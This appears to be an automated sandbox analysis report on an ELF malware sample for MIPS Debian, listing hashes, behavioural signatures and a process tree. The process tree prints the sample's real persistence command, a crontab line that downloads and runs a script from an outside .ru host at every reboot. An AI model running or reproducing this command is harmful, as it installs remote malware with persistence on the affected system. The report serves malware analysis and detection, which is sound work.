Analysis

  • max time kernel
    142s
  • max time network
    139s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    27-10-2024 02:49

General

  • Target

    b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf

  • Size

    99KB

  • MD5

    2ebce2c623cee35100ce645095e0e17a

  • SHA1

    f8cf8d0db764834f60325110897e8a7cabc96fc4

  • SHA256

    b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840

  • SHA512

    1c3591b36a1ba39c07054af82aff3311f56c051399d027e800618831f40b2e0b3f121118dbe4a81eb2ec3f4203b127887e05c7164c3af8afd08b10a12d27d00e

  • SSDEEP

    1536:IHC8aIWiD9AW0FLQ4LBOe+h2s9ieZWUHy6Yb7SWTnvgkwBu:IHC8HWMxhlUeSl7wBu

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name 1 IoCs
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
    /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:709
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:711
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        • Reads runtime system information
        PID:713
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:714

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • /var/spool/cron/crontabs/tmp.DDLmqg

    Filesize

    306B

    MD5

    8c9ff02103c706a091467f66f463d116

    SHA1

    8389f2e1cb1e2bb7034773f88119c45482870a46

    SHA256

    e001ff127ebf9d6ceed98f1c5b5326b833864a8473b0e072b64de7315ed8c6f4

    SHA512

    da6e9fa9b71115b07d4e4a561800b89732fc20031c955ad9aa11befda0c2567547aa324fb47ad3db536a9dfb93173352d3c3613124b13ae866ac44d77cf8e555